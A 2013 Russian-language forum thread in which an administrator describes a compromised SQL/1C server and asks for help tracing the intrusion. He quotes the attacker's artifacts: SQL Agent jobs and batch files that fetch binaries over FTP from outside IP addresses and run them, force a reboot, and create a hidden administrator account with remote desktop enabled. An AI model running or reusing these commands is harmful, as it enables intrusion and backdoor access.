Вирус или хакер? Где еще искать вирусы или нарушения работы компа?

Админ

24.12.13

✎

18:32

Вирус или хакер? Где еще искать вирусы или нарушения работы компа?

Сегодня утром увидел, что комп с базой сам перезагрузился и появился еще один пользователь винды net123.
Пролечил курайти и авз - ничего не находит.
Посмотрел лог антивируса - там несколько файлов в карантине и появились новые задания СКЛ, а также в планировщике винды (хрюша, скл2000, 1с7.7).

Вот что я нашел.(заранее вопрос - где еще искать?)
1) Появилис новые задания в СКЛ
- TimingReboot (название)
cmd (тип)
shutdown -r -f -t 0 (команда)

- ctfmon.exe
cmd
cmd /c echo open 222.247.45.29>c:\RECYCLER\zyctfmon.exe&echo 123>>c:\RECYCLER\zyctfmon.exe&echo 123>>c:\RECYCLER\zyctfmon.exe&echo get ctfmon.exe c:\RECYCLER\stctfmon.exe>>c:\RECYCLER\zyctfmon.exe&echo bye>>c:\RECYCLER\zyctfmon.exe&ftp -s:c:\RECYCLER\zyctfmon.exe&if EXIST c:\RECYCLER\stctfmon.exe (start c:\RECYCLER\stctfmon.exe)&del c:\RECYCLER\zyctfmon.exe&exit

2) появился еще один пользователь в СКЛ с правами System Administrator:
wwo

3) При попытке удалить этого пользователя СКЛ wwo выдает ошибку:
Error 15174: Could not find stored procedure 'sp_droplogin'
и пользоваетль не удаляется.

4) Антивирус Eset 4 и я сам нашел такие вирусы (подозрительные файлы) в корне диска С и в system32:
ISservice.exe
hexISservice.exe
Server.exe
fuckgo.inf

5) батники в корне диска с и в system32

- gouri.bat
ping 127.0.0.1
Server.exe
ping 127.0.0.1
c:\Server.exe

- cxg13.bat
open 199.192.158.200
110
110
bin
get ISservice.exe
bye

sb.bat
net user user$ user123$
net localgroup administrators user$/add
net user user$/active:yes
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f"

1 ilpar

24.12.13

✎

18:37

Это принципиально?

Все равно так светит утечка данных или шифрование данных с выкупом.

2 Дятел81

24.12.13

✎

18:41

(1) не принципиально
главное как защитить данные от вмешательства

3 Курильщик

24.12.13